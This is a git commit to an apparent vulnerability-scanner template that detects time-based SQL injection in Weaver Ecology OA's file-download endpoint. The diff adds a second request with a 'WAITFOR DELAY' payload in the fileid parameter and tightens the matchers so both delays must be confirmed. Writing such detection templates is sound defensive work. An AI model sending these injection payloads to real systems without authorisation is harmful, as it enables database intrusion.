Update ecology-oa-file-sqli.yaml

2023-10-31 18:54:08 +08:00 · 2023-10-31 18:54:08 +08:00 · 0f9ea410fa
parent f2628fb270
commit 0f9ea410fa
1 changed files with 16 additions and 4 deletions
--- a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml
+++ b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml
@ -23,14 +23,26 @@ http:
        Host: {{Hostname}}

        isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:7'
+      - |
+        @timeout: 25s
+        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
+        Host: {{Hostname}}

+        isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:15'
+
+    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
-          - 'duration>=7'
-          - 'status_code == 200'
-          - 'content_length == 0'
-          - 'contains(set_cookie, "ecology_JSessionid=")'
+          - 'duration_1>=7'
+          - 'status_code_1 == 200'
+          - 'contains(header_1, "ecology_JSessionid=")'
        condition: and

+      - type: dsl
+        dsl:
+          - 'duration_2>=15'
+          - 'status_code_2 == 200'
+          - 'contains(header_2, "ecology_JSessionid=")'
+        condition: and
 # digest: 4a0a004730450220706de22bcda877d015e3158b4912359fceab8b5c6888f625675921c48ebf595f022100baf7463de1956ebc43063ae318c3e1e9b4ee0e96dc1652136e8c0b3c68ae1978:922c64590222798bb761d5b6d8e72950